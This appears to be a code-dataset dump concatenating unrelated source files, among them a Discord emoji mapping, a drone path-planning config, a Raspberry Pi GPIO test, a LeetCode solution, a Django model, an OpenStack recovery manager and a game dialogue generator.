'<:champ_6:601909560751423526>', '110': '<:champ_110:601909562953433098>', '67': '<:champ_67:601909566078451735>', '45': '<:champ_45:601909568452165653>', '161': '<:champ_161:601909571069411359>', '254': '<:champ_254:601909573863079936>', '112': '<:champ_112:601909575800717332>', '8': '<:champ_8:601909578438934677>', '106': '<:champ_106:601909581311901719>', '19': '<:champ_19:601909584277405709>', '498': '<:champ_498:601909586701582336>', '101': '<:champ_101:601909589369159691>', '5': '<:champ_5:601909591667769364>', '157': '<:champ_157:601909594758971468>', '83': '<:champ_83:601909596877094940>', '350': 
'<:champ_350:601909599469305875>', '154': '<:champ_154:601909605194268673>', '238': '<:champ_238:601909607824359462>', '115': '<:champ_115:601909610885939200>', '26': '<:champ_26:601909614031798447>', '142': '<:champ_142:601909616258973696>', '143': '<:champ_143:601909618808979478>'}
RUNE_ID_TO_EMOJI = {'8112': '<:rune_8112:602195444940144650>', '8124': '<:rune_8124:602195452028518410>', '8128': '<:rune_8128:602195459003514920>', '9923': '<:rune_9923:602195465299165308>', '8126': '<:rune_8126:602195466981212190>', '8139': '<:rune_8139:602195469573160970>', '8143': '<:rune_8143:602195471859056641>', '8136': '<:rune_8136:602195473264017462>', '8120': '<:rune_8120:602195475013173288>', '8138': '<:rune_8138:602195477257256963>', '8135': '<:rune_8135:602195479417192449>', '8134': '<:rune_8134:602195482487554058>', '8105': '<:rune_8105:602195484748152843>', '8106': '<:rune_8106:602195487650742283>', '8351': '<:rune_8351:602195494319423529>', '8359': '<:rune_8359:602195503048032291>', '8360': '<:rune_8360:602195510388064256>', '8306': '<:rune_8306:602195512036163585>', '8304': '<:rune_8304:602195513173082113>', '8313': '<:rune_8313:602195513546244128>', '8321': '<:rune_8321:602195517103014084>', '8316': '<:rune_8316:602195519829311562>', '8345': '<:rune_8345:602195522345893911>', '8347': '<:rune_8347:602195524338319370>', '8410': '<:rune_8410:602195527479722000>', '8352': '<:rune_8352:602195529291661489>', '8005': '<:rune_8005:602195538036785152>', '8008': '<:rune_8008:602195543464345601>', '8021': '<:rune_8021:602195550271700992>', '8010': '<:rune_8010:602195555006939137>', '9101': '<:rune_9101:602195557502681088>', '9111': '<:rune_9111:602195559880851536>', '8009': '<:rune_8009:602195562481057792>', '9104': '<:rune_9104:602195563936743455>', '9105': '<:rune_9105:602195565408813056>', '9103': '<:rune_9103:602195567241854979>', '8014': '<:rune_8014:602195568759930900>', '8017': '<:rune_8017:602195571364724774>', '8299': '<:rune_8299:602195573952479242>', '8437': '<:rune_8437:602195580919349261>', '8439': '<:rune_8439:602195586468544533>', '8465': '<:rune_8465:602195592357347358>', '8446': '<:rune_8446:602195594643243018>', '8463': '<:rune_8463:602195596736200757>', '8401': '<:rune_8401:602195601475764234>', '8429': '<:rune_8429:602195603308675078>', 
'8444': '<:rune_8444:602195605334392832>', '8473': '<:rune_8473:602195607670620161>', '8451': '<:rune_8451:602195610233339914>', '8453': '<:rune_8453:602195612569567250>', '8242': '<:rune_8242:602195615321030840>', '8214': '<:rune_8214:602195620601528330>', '8229': '<:rune_8229:602195626293198859>', '8230': '<:rune_8230:602195631255060541>', '8224': '<:rune_8224:602195633171857418>', '8226': '<:rune_8226:602195635868925970>', '8275': '<:rune_8275:602195639140483072>', '8210': '<:rune_8210:602195640432328792>', '8234': '<:rune_8234:602195643515011092>', '8233': '<:rune_8233:602195645956096010>', '8237': '<:rune_8237:602195647268913162>', '8232': '<:rune_8232:602195649907392525>', '8236': '<:rune_8236:602195652235231235>'}
MASTERIES_TO_EMOJI = {'1': '<:masteries_1:602201182131322886>', '2': '<:masteries_2:602201195792039967>', '3': '<:masteries_3:602201208505106453>', '4': '<:masteries_4:602201225701883924>', '5': '<:masteries_5:602201238528065557>', '6': '<:masteries_6:602201251069034496>', '7': '<:masteries_7:602201263152693325>'}
CHAMP_NONE_EMOJI = "<:champ_0:602225831095435294>"
INVISIBLE_EMOJI = "<:__:602265603893493761>"
CHAMP_NAME_TO_ID = {'Aatrox': '266', 'Ahri': '103', 'Akali': '84', 'Alistar': '12', 'Amumu': '32', 'Anivia': '34', 'Annie': '1', 'Ashe': '22', 'Aurelion Sol': '136', 'Azir': '268', 'Bard': '432', 'Blitzcrank': '53', 'Brand': '63', 'Braum': '201', 'Caitlyn': '51', 'Camille': '164', 'Cassiopeia': '69', "Cho'Gath": '31', 'Corki': '42', 'Darius': '122', 'Diana': '131', 'Draven': '119', 'Dr. Mundo': '36', 'Ekko': '245', 'Elise': '60', 'Evelynn': '28', 'Ezreal': '81', 'Fiddlesticks': '9', 'Fiora': '114', 'Fizz': '105', 'Galio': '3', 'Gangplank': '41', 'Garen': '86', 'Gnar': '150', 'Gragas': '79', 'Graves': '104', 'Hecarim': '120', 'Heimerdinger': '74', 'Illaoi': '420', 'Irelia': '39', 'Ivern': '427', 'Janna': '40', 'Jarvan IV': '59', 'Jax': '24', 'Jayce': '126', 'Jhin': '202', 'Jinx': '222', "Kai'Sa": '145', 'Kalista': '429', 'Karma': '43', 'Karthus': '30', 'Kassadin': '38', 'Katarina': '55', 'Kayle': '10', 'Kayn': '141', 'Kennen': '85', "Kha'Zix": '121', 'Kindred': '203', 'Kled': '240', "Kog'Maw": '96', 'LeBlanc': '7', 'Lee Sin': '64', 'Leona': '89', 'Lissandra': '127', 'Lucian': '236', 'Lulu': '117', 'Lux': '99', 'Malphite': '54', 'Malzahar': '90', 'Maokai': '57', 'Master Yi': '11', 'Miss Fortune': '21', 'Wukong': '62', 'Mordekaiser': '82', 'Morgana': '25', 'Nami': '267', 'Nasus': '75', 'Nautilus': '111', 'Neeko': '518', 'Nidalee': '76', 'Nocturne': '56', 'Nunu & Willump': '20', 'Olaf': '2', 'Orianna': '61', 'Ornn': '516', 'Pantheon': '80', 'Poppy': '78', 'Pyke': '555', 'Qiyana': '246', 'Quinn': '133', 'Rakan': '497', 'Rammus': '33', "Rek'Sai": '421', 'Renekton': '58', 'Rengar': '107', 'Riven': '92', 'Rumble': '68', 'Ryze': '13', 'Sejuani': '113', 'Senna': '235', 'Shaco': '35', 'Shen': '98', 'Shyvana': '102', 'Singed': '27', 'Sion': '14', 'Sivir': '15', 'Skarner': '72', 'Sona': '37', 'Soraka': '16', 'Swain': '50', 'Sylas': '517', 'Syndra': '134', 'Tahm Kench': '223', 'Taliyah': '163', 'Talon': '91', 'Taric': '44', 'Teemo': '17', 'Thresh': '412', 'Tristana': '18', 
'Trundle': '48', 'Tryndamere': '23', 'Twisted Fate': '4', 'Twitch': '29', 'Udyr': '77', 'Urgot': '6', 'Varus': '110', 'Vayne': '67', 'Veigar': '45', "Vel'Koz": '161', 'Vi': '254', 'Viktor': '112', 'Vladimir': '8', 'Volibear': '106', 'Warwick': '19', 'Xayah': '498', 'Xerath': '101', 'Xin Zhao': '5', 'Yasuo': '157', 'Yorick': '83', 'Yuumi': '350', 'Zac': '154', 'Zed': '238', 'Ziggs': '115', 'Zilean': '26', 'Zoe': '142', 'Zyra': '143'}
TFT_PRICES = [INVISIBLE_EMOJI, '<:tft_g1:652142396405972992>', '<:tft_g2:652142435606069248>', '<:tft_g3:652142468007067649>', '<:tft_g4:652142511913041960>', '<:tft_g5:652142572541575181>'] | [
"mceldenn@gmail.com"
] | mceldenn@gmail.com |
dc8402c232d6ab46a1595210ee6304cf9a9a40f6 | 55d4c18fdef438d73a9172a5cc9d55963e9690a6 | /GSO/4.Dynamic Obstacles/config_user.py | c6c72cdc587707a29055d683a15b1bee130eaf9f | [] | no_license | saxenapriyansh/GSO-Path-Planning | 9bf723a58658e7a4565ceb62801ab8ecf9d8e400 | e334ee5858639ab75b7be84cd19da964b98b4d89 | refs/heads/master | 2021-10-27T17:13:58.988517 | 2019-04-18T14:42:25 | 2019-04-18T14:42:25 | 180,512,081 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,830 | py | # Configuration File
from __future__ import division
import math
import collections
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
testingMode = False # suppresses figure generation, outputs from main*.py are not printed
makeFigure = True
makeMovie = True
startWithEmptyMap = True
makeRandObs = False
useMovingObs = True
useMovingGoals = True
restrictVerticalMovement = True
useHierarchicalPlanning = True
numHierLevels = 0
######################################
staticX, staticY, staticZ = 64, 10, 6
######################################
percentFixedRandomObstacles = 0
safetymargin = 1
cX, cY, cZ = 1, 1, 2 # cX and cY currently are unused - modify computeCost if desired
heuristicScale = 1.01
searchRadius = 20
refinementDistance = math.ceil(searchRadius * 1) # must be an integer
t_max = float('inf') # Max time to spend on path-finding, in milliseconds. Enter inf to prevent restriction
sizeX = 64
sizeY = 64
sizeZ = 64
mapscale = 1
start = (3*mapscale , 3*mapscale, 6*mapscale) # start coordinates
goals = np.array([[18., 16., 19., 0.], [staticX, staticY, staticZ, 0.]]) * mapscale # goal coordinates
# Configure Moving Goals
initX = [4, 12]# [7, 6]
initY = [2, 3]#[5, 2]
initZ = [3, 4]#[2, 7]
T = [5, 4]#[5, 2]
obs = np.array([[56., 26., 6., 0.]]) * mapscale
obsX = [30, 40,10,6,47,25,59] #[12, 6]
obsY = [5, 30,50,6,57,48,9] #[3, 2]
obsZ = [26, 6,50,6,17,28,39] #[4, 7]
T_obs = [3, 3 , 3, 3, 3,3, 3 , 3, 3, 3,3, 3 , 3, 3, 3,3, 3 , 3, 3, 3,3, 3 , 3, 3, 3,3, 3 , 3, 3, 3,3, 3 , 3, 3, 3,3, 3 , 3, 3, 3,3, 3 , 3, 3, 3,3, 3 , 3, 3, 3]
# Fixed Individual Obstacles
obstacles = []
# Fixed Rectangular Obstacles
rXstart = [8, 12, 15, 35, 41, 49]
rYstart = [2, 15, 35, 10, 20, 47]
rZstart = [1, 1, 1, 1, 1, 1]
rXdim = [4, 20, 30, 5, 8, 6]
rYdim = [9, 12, 8, 5, 8, 6]
rZdim = [30, 8, 15, 28, 20, 28]
# rXstart = []
# rYstart = []
# rZstart = []
# rXdim = []
# rYdim = []
# rZdim = []
vidname = '4.GSOVid'
fps = 10 # higher = faster playback speed
dpi = 500 # higher = better quality, slower runtime
imgformat = 'png' # currently only works for png
# Generate Random Dynamic Obstacles
randomint = np.random.random_integers
minObs = 1
maxObs = 3
maxPercent = 8
seedDyn = np.random.randint(0,1000)
#seedDyn = np.random.randint(0,10)
#seedDyn = 432
# Generate Random Fixed Obstacles
num2gen = int(round(percentFixedRandomObstacles/100 * sizeX*sizeY*sizeZ))
seedStatic = np.random.random_integers(0,1000)
#seedStatic = np.random.random_integers(0,10
#seedStatic = 141
"""
====================================================================================
================== Variables below this line are not user inputs ===================
============== They are here for configuration or to create variables ==============
====================================================================================
============== The " # Additional variables " block at the very bottom =============
============== is the exception to this and may be modified if desired =============
====================================================================================
"""
# if testingEnvironment == '3DF_20':
# sizeX, sizeY, sizeZ = 150, 150, 150
# start = (75,75,75)
# goals = np.array([[150, 150, 150, 0]])
# percentFixedRandomObstacles = 20
# restrictVerticalMovement = False
# cX, cY, cZ = 1, 1, 1
# searchRadius = 7
# percentFixedRandomObstacles = 20
#
# elif testingEnvironment == '3DF_50':
# sizeX, sizeY, sizeZ = 150, 150, 150
# start = (75,75,75)
# goals = np.array([[150, 150, 150, 0]])
# percentFixedRandomObstacles = 20
# restrictVerticalMovement = False
# cX, cY, cZ = 1, 1, 1
# searchRadius = 7
# percentFixedRandomObstacles = 50
#
# elif testingEnvironment == 'city':
# sizeX = 64
# sizeY = 64
# sizeZ = 64
# start = (3*mapscale , 4*mapscale, 6*mapscale)
# goals = np.array([[62., 60., 6., 0.]]) * mapscale
# percentFixedRandomObstacles = 0
#
# rXstart = [8, 12, 15, 35, 41, 49]
# rYstart = [2, 15, 35, 10, 20, 47]
# rZstart = [1, 1, 1, 1, 1, 1]
# rXdim = [4, 20, 30, 5, 8, 6]
# rYdim = [9, 12, 8, 5, 8, 6]
# rZdim = [30, 8, 15, 28, 20, 28]
#
# elif testingEnvironment == 'random':
# sizeX = 150
# sizeY = 150
# sizeZ = 150
# start = (5 , 5, sizeZ/2)
# goals = np.array([[sizeX-5., sizeY-5., sizeZ/2., 0.]])
# Modifying by scale factor
initX = [mapscale*point for point in initX]
initY = [mapscale*point for point in initY]
initZ = [mapscale*point for point in initZ]
obsX = [mapscale*point for point in obsX]
obsY = [mapscale*point for point in obsY]
obsZ = [mapscale*point for point in obsZ]
rXstart = [mapscale*(point) for point in rXstart if point >= 1]
rYstart = [mapscale*(point) for point in rYstart if point >= 1]
rZstart = [point for point in rZstart if point >= 1]
rXdim = [mapscale*(point) for point in rXdim if point <= sizeX]
rYdim = [mapscale*(point) for point in rYdim if point <= sizeY]
rZdim = [mapscale*(point) for point in rZdim if point <= sizeZ]
sizeX *= mapscale
sizeY *= mapscale
sizeZ *= mapscale
if testingMode:
makeFigure = False
makeMovie = False
if makeMovie:
makeFigure = True
if not useMovingGoals:
initX = []
initY = []
initZ = []
T = []
goalsVisited, goalhandles, numGoals, goal = [], [], [], []
stepCount = 1 # number of total iterations
number_of_obstacles = 0 # for genRandObs function
numNodes = sizeX*sizeY*sizeZ
goalMoved = False
numlevels = 0
# Set up initial heading angles to factor in direction of travel
oldstart = None
# Set up UAV map and plot
map_ = collections.defaultdict(lambda : 0)
costMatrix = collections.defaultdict(lambda: 1)
if makeFigure:
fig1 = plt.figure()
#ax1 = fig1.add_subplot(111, projection='3d')
ax1 = fig1.gca(projection='3d')
# Used to save some variables
hdl = []
closed_list = 0
output = {}
# Additional variables
zf1, zf2 = 1, 0 # provides more flexibility over coarse z-movement; zf1 = multiplier, zf2 = added constant
# use (1,0) for default, or (0,x) to set coarse z-successors at a distance of x
distancerequirement = 7 # used in findPath function. determines cluster size used for coarse paths
# shorter = faster, but may have longer paths
# too small and it may not find a path, so >=6 recommended
minclustersize = 4 # represents dimension of smallest cluster in terms of L0 nodes
alpha = 0.5 # use 0.5 for centripetal splines
splinePoints = 5 # Enter 2 to not use splines, otherwise 5 is recommended | [
"saxenapriyanshasd@gmail.com"
] | saxenapriyanshasd@gmail.com |
138ad6816981ced62f71bd3859116d1fa7ecfa16 | e8d34c096f9df7f22ff5ccee34cf9f6e6a0adab4 | /flask_login/test_gpios.py | 3de4b6984d75c2f38c64ff8539dbc50799074af9 | [] | no_license | MarianoDel/coralpreto_py | 50fed2bd4032d4e3adc29c06de4b096ee1b3833a | 06bbe3f814fdbf80ae58b1ba6a53d0e96f0ec566 | refs/heads/master | 2023-03-07T14:19:19.074639 | 2022-03-25T17:34:38 | 2022-03-25T17:34:38 | 238,445,438 | 0 | 0 | null | 2023-03-05T06:04:33 | 2020-02-05T12:30:05 | JavaScript | UTF-8 | Python | false | false | 1,416 | py | # -*- coding: utf-8 -*-
#usar python3
import time
RUNNING_ON_RASP = 0
if RUNNING_ON_RASP:
from gpios import *
GpiosInit()
def TestBlue():
print ("start blinking blue led for 10 secs")
if RUNNING_ON_RASP:
LedBlueToggleContinous('start')
time.sleep(10)
print ("ending toggling")
if RUNNING_ON_RASP:
LedBlueToggleContinous('stop')
print ("test ended!")
def TestChannel ():
channel = ['09', '12', '14', '71', '72', '74', '77', '81']
for i in range(len(channel)):
print ("memory: " + str(i) + " test channel: " + channel[i])
if RUNNING_ON_RASP:
Channel_to_Memory(channel)
time.sleep(5)
print ("test ended!")
def TestPtt():
print ("PTT on for 5 secs")
if RUNNING_ON_RASP:
PttOn()
time.sleep(5)
if RUNNING_ON_RASP:
PttOff()
print ("Ptt off")
print ("test ended!")
def TestEncendido():
print ("Encendido on for 5 secs")
if RUNNING_ON_RASP:
OnOff_On()
time.sleep(5)
if RUNNING_ON_RASP:
OnOff_Off()
print ("Encendido off")
print ("test ended!")
def InitialValues ():
LedBlueOff()
PttOff()
OnOff_Off()
Bit0Off()
Bit1Off()
Bit2Off()
##############
# Main Tests #
##############
InitialValues()
TestBlue()
TestChannel()
TestPtt()
TestEncendido()
GpiosCleanUp()
| [
"marianodeleu@yahoo.com.ar"
] | marianodeleu@yahoo.com.ar |
fe5008878edb08f5883649ab0765b19fdb4de0ce | 3b944f1714c458c5d6d0e84d4b1498f2b59c4ef7 | /581. Shortest Unsorted Continuous Subarray.py | 3fa7d45d3112e56a100aa8150f35c38a0d623fae | [] | no_license | shiannn/LeetCodePython | e4d66f108200d8329616b3e45b70c3f8fc4cd9ed | 6e4472d41904e60ff9d70b5f3979c5dcae98c838 | refs/heads/master | 2021-06-26T03:24:03.079077 | 2021-02-24T16:54:18 | 2021-02-24T16:54:18 | 213,206,772 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 654 | py | class Solution:
def findUnsortedSubarray(self, nums) -> int:
end = -2
start = -1
max_ = -float('inf')
for idx, num in enumerate(nums):
max_ = max(max_, num)
if max_ != num:
end = idx
min_ = float('inf')
for idx, num in reversed(list(enumerate(nums))):
#print(idx, num)
min_ = min(min_, num)
if min_ != num:
start = idx
#print(start, end)
return end - start + 1
if __name__ == '__main__':
    # Smoke test: the unsorted middle section is [6, 4, 8, 10, 9] -> 5.
    sol = Solution()
    nums = [2,6,4,8,10,9,15]
    ret = sol.findUnsortedSubarray(nums)
    print(ret)
"b05502087@ntu.edu.tw"
] | b05502087@ntu.edu.tw |
e59999e3a7d2a6f4b66c537625cf26c6815890f4 | 20d1969e0b202b38f7735fb2509f3db6a0d5fea1 | /models.py | c9d943d9cdb341c0c7f0d3d95db38cbf12a3de4b | [] | no_license | TukieYA/my-first-app | 8158ad73dc2fd307ca2547c7cad1afad615a55ea | f62453f17ef681669063e0506b75423497cf77b9 | refs/heads/master | 2021-01-05T20:12:54.870785 | 2020-02-17T13:53:36 | 2020-02-17T13:53:36 | 241,125,380 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | from django.db import models
from django.conf import settings
from django.db import models
from django.utils import timezone
class Post(models.Model):
    """A blog post written by a site user."""
    # Deleting the author cascades and removes their posts as well.
    author = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
    title = models.CharField(max_length=200)
    text = models.TextField()
    created_date = models.DateTimeField(default=timezone.now)
    # Stays NULL until publish() is called.
    published_date = models.DateTimeField(blank=True, null=True)

    def publish(self):
        """Stamp the post as published now and persist it."""
        self.published_date = timezone.now()
        self.save()

    def __str__(self):
        # Admin list pages and the shell show the title.
        return self.title
| [
"ilnur.musin.03@mail.ru"
] | ilnur.musin.03@mail.ru |
701cceafbc17e8595614eabc2d26909564c55589 | 99249dad36df26a712ae8d900041d53acf3901ea | /settings/channel_archiver/NIH.SAMPLE_FROZEN_XRAY_settings.py | 0cf3746eba7d2d3f8917deddf604d4ffaa86f80d | [
"MIT"
] | permissive | bopopescu/Lauecollect | f1f79c2cc5ff106df0dedbd6939ec92630d2b305 | 60ae2b05ea8596ba0decf426e37aeaca0bc8b6be | refs/heads/master | 2022-11-29T00:40:28.384831 | 2019-06-05T01:21:36 | 2019-06-05T01:21:36 | 280,989,300 | 0 | 0 | MIT | 2020-07-20T02:03:22 | 2020-07-20T02:03:22 | null | UTF-8 | Python | false | false | 111 | py | SPOTS.filename = '//femto/C/All Projects/APS/Experiments/2019.05/Test/Archive/NIH.SAMPLE_FROZEN_XRAY.SPOTS.txt' | [
"friedrich.schotte@gmail.com"
] | friedrich.schotte@gmail.com |
0b7f2dfe5e49b472a8425e098959e9023bb7ecd1 | 7aa5966732a9e3d49821599329950a16c88ab286 | /week2task1.py | bc9b4f322647785d467a566b98af1219541b98c8 | [] | no_license | Sal-Eng-666/WIDweek2 | 7cabd6eb0bf68df68e76da725f56593c89e6abc7 | fa9951b4727d57ccc85746e91aaa3f394e14baa1 | refs/heads/master | 2023-03-04T20:57:01.081060 | 2021-01-17T12:25:52 | 2021-01-17T12:25:52 | 329,721,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 782 | py | #create your own DFD, a subject of your own choice and convert it into code
def procedure_1(inp_menuoption):
    """Prompt for a drink category and ask the matching follow-up question.

    The category is read interactively from stdin, so ``inp_menuoption`` is
    unused; it is kept only for interface compatibility with existing
    callers. Raises ValueError if the user types a non-integer.
    """
    # Removed the unused beer/cider/wine/non_alcoholic locals — the menu
    # numbers are compared literally below.
    print("Hello, what drink would you like?")
    menuoption = int(input("Select an option 1 for beer, 2 for cider, 3 for wine or 4 for a non alcoholic drink"))
    if menuoption == 1:
        print("Would you like a Lager, Ale or Stout?")
    elif menuoption == 2:
        print("Dry, Sweet or Fruit based?")
    elif menuoption == 3:
        print("Red, White, Rose or Sparkling?")
    elif menuoption == 4:
        print("Tea, Coffee, or Soft Drink?")
def procedure_2(inp_menuoption2):
    """Ask the pint-or-half follow-up question and return the answer.

    ``inp_menuoption2`` is unused but kept for interface compatibility.
    """
    # BUG FIX: the original `menuoption2 (input(...))` *called* the
    # undefined name `menuoption2`, raising NameError at runtime; an
    # assignment was clearly intended. The unused lager/ale/stout/dry/
    # sweet/fruit locals are removed. The answer is now returned so the
    # function has an observable result (previously it returned None).
    menuoption2 = input("Will that be a pint or a half?")
    return menuoption2
| [
"lady_snowblood@hotmail.com"
] | lady_snowblood@hotmail.com |
585fdc24817f4227bd9b735d629d948023a89550 | 9c89ab8fd0a4e1b488005ccbce94de879f319bc6 | /recover-client/manager.py | b057fc5ba2d219d39cc0e19652c1e407a98540e2 | [] | no_license | openstackenabling/vmrecovery | e1752bc901a9c3f4dfa335cdb159d6d0c24dd2c1 | 8100dadbb656ac337b80c93060066bc2e685e8a4 | refs/heads/master | 2021-01-16T20:42:55.826886 | 2013-05-16T08:36:48 | 2013-05-16T08:36:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,827 | py | #
# Copyright (C) 2013 Intel Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import db
from nova import flags
from nova import manager
from nova.openstack.common import cfg
from nova.openstack.common import importutils
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
# Lets operators swap in a custom recovery driver through nova's flag system.
scheduler_driver_opt = cfg.StrOpt('recover_driver',
                                  default='nova.recover.driver.RecoverDriver',
                                  help='Default driver to use for the recover')
FLAGS = flags.FLAGS
FLAGS.register_opt(scheduler_driver_opt)
# NOTE(review): LOG was already bound a few lines above; this rebinding is
# redundant but harmless — confirm before removing.
LOG = logging.getLogger(__name__)
# RPC topic this manager listens on.
topic = 'recover'
class RecoverManager(manager.Manager):
    """Nova manager that delegates VM recovery work to a pluggable driver."""

    RPC_API_VERSION = "1.0"

    def __init__(self, driver=None, *args, **kwargs):
        # Fall back to the flag-configured driver class when none is given.
        if not driver:
            driver = FLAGS.recover_driver
        self.driver = importutils.import_object(driver)
        super(RecoverManager, self).__init__(*args, **kwargs)

    def recover_vm(self, context, port_id, port_mac, vm_uuid, vm_name):
        """Recover a VM's network (via quantum) and the VM itself (via libvirt).

        :param context: request context, passed through to the driver
        :param port_id: quantum port id to restore
        :param port_mac: MAC address of that port
        :param vm_uuid: UUID of the instance to recover
        :param vm_name: libvirt domain name of the instance
        """
        # NOTE(review): the driver is invoked with (vm_name, vm_uuid,
        # port_id, port_mac) — a different order than this signature;
        # confirm the driver's expected ordering before refactoring.
        self.driver.recover_vm(context, vm_name, vm_uuid, port_id, port_mac)
| [
"heyuan.liu@intel.com"
] | heyuan.liu@intel.com |
f82d11c69de4d63b9824a1f73e4ded7104d8526b | e2ed3e8c78e3a9da30c354bfbc833e17eef037eb | /Diagen/diagen.py | b161062ee912930e76186abaa606c03afc2bf71d | [
"MIT"
] | permissive | Dav-Edward/Tachyon-Starwisp-Mod | 044049e04c178ce0cce5851843f6da341b9e0137 | 542d4ff128a8084ec42dcc9d41db8866ab0638eb | refs/heads/master | 2021-07-25T13:06:49.104131 | 2020-06-07T19:17:05 | 2020-06-07T19:17:05 | 181,711,435 | 1 | 0 | null | 2020-03-29T20:38:46 | 2019-04-16T14:56:17 | Python | UTF-8 | Python | false | false | 27,244 | py | #!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2018 Hornwitser
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from xml.etree.ElementTree import Comment, Element, ElementTree, SubElement
from collections import namedtuple
from itertools import count
# Public API of the diagen module.
__all__ = [
    'Label', 'Choice', 'Condition', 'Goto', 'End',
    'Event', 'Reply', 'InlineEvent', 'EventDef', 'ChainEvent', 'SpawnNPC',
    'AddShip', 'Ai', 'AddDebris', 'Item', 'xml_dialogues', 'xml_pretty',
]

## Message Directives
# Label(id): set the next message's id.
Label = namedtuple('Label', 'id')

# Sentinel type for End. Constructing EndType() hands back the shared End
# singleton, so every End compares identical with `is`. End signals the
# end of the message stream.
class EndType:
    def __new__(cls):
        return End
    @staticmethod
    def __repr__():
        return 'End'
End = object.__new__(EndType)

# Goto(target): continue the dialogue at the message with the given id.
Goto = namedtuple('Goto', 'target')
# Event(id, target): attach an event call to the previous message.
Event = namedtuple('Event', 'id target')
# Set the reply text of the previous message.
_BaseReply = namedtuple('Reply', 'text params')
class Reply(_BaseReply):
    """Reply(text, params): set the reply text/attributes of a message."""
    def __new__(cls, text=None, params={}, **extra):
        # Merge the positional mapping with keyword extras; extras win.
        merged = dict(params)
        merged.update(extra)
        return super().__new__(cls, text, merged)
# Choice(text, choices): a multiple-choice message. `choices` is a list of
# subsections; the generated reply element can be tuned with Reply,
# Condition, Goto and End placed at the start of each choice subsection.
Choice = namedtuple('Choice', 'text choices')

# InlineEvent: attach an event defined inline to the previous message.
# In this and every wrapper below, keyword extras are merged over `params`.
_BaseInlineEvent = namedtuple('InlineEvent', 'type target name params')
class InlineEvent(_BaseInlineEvent):
    def __new__(cls, type, target, name=None, params={}, **extra):
        return super().__new__(cls, type, target, name, {**params, **extra})

## Event Directives
# EventDef: define a named event.
_BaseEventDef = namedtuple('EventDef', 'type name params')
class EventDef(_BaseEventDef):
    def __new__(cls, type, name, params={}, **extra):
        return super().__new__(cls, type, name, {**params, **extra})

# ChainEvent: define an event and attach it to the previous event.
_BaseChainEvent = namedtuple('ChainEvent', 'type name params')
class ChainEvent(_BaseChainEvent):
    def __new__(cls, type, name=None, params={}, **extra):
        return super().__new__(cls, type, name, {**params, **extra})

# SpawnNPC: an npc spawn for either an event or a ship.
_BaseSpawnNPC = namedtuple('SpawnNPC', 'params')
class SpawnNPC(_BaseSpawnNPC):
    def __new__(cls, params={}, **extra):
        return super().__new__(cls, {**params, **extra})

# AddShip: a ship for an event.
_BaseAddShip = namedtuple('AddShip', 'params')
class AddShip(_BaseAddShip):
    def __new__(cls, params={}, **extra):
        return super().__new__(cls, {**params, **extra})

# Ai: an ai for either a ship or an npc.
_BaseAi = namedtuple('Ai', 'type params')
class Ai(_BaseAi):
    def __new__(cls, type, params={}, **extra):
        return super().__new__(cls, type, {**params, **extra})

# AddDebris: a debris node for an event.
_BaseAddDebris = namedtuple('AddDebris', 'params')
class AddDebris(_BaseAddDebris):
    def __new__(cls, params={}, **extra):
        return super().__new__(cls, {**params, **extra})

# Item: an item carried by a debris node.
_BaseItem = namedtuple('Item', 'params')
class Item(_BaseItem):
    def __new__(cls, params={}, **extra):
        return super().__new__(cls, {**params, **extra})

## Shared Directives
# Condition: the condition of a choice, event or ai. May only be used at the
# start of a choice subsection or after an event, ship or npc definition.
_BaseCondition = namedtuple('Condition', 'type params')
class Condition(_BaseCondition):
    def __new__(cls, type, params={}, **extra):
        return super().__new__(cls, type, {**params, **extra})
# Internal use types
# Auto is a sentinel meaning "fill this in later" (ids, targets, texts);
# like End, it is a singleton, so AutoType() returns the shared instance.
class AutoType:
    def __new__(cls):
        return Auto
    @staticmethod
    def __repr__():
        return 'Auto'
Auto = object.__new__(AutoType)

class ParsedReply:
    # Mutable working form of a choice reply while a section is parsed.
    def __init__(self, target, text, params):
        self.id = Auto
        self.target = target
        self.text = text
        self.params = params
        self.conditions = []

class ParsedMessage:
    # Mutable working form of a message; next/response links are resolved
    # in a later pass (see assign_ids/resolve).
    def __init__(self, mid, text):
        self.id = mid
        self.text = text
        self.next = Auto
        self.response = Auto
        self.choices = []
        self.events = []

class ParsedEvent:
    # Mutable working form of an event definition (inline or standalone).
    def __init__(self, event_type, name, params):
        self.type = event_type
        self.name = name
        self.params = params
        self.target = None
        self.conditions = []
        self.npcs = []
        self.debris = []
        self.ships = []

class ParsedDebri:
    # A debris node plus the items it carries.
    def __init__(self, params):
        self.params = params
        self.items = []

class ParsedAi:
    # An AI behaviour plus its activation conditions.
    def __init__(self, ai_type, params):
        self.type = ai_type
        self.params = params
        self.conditions = []

class ParsedNPC:
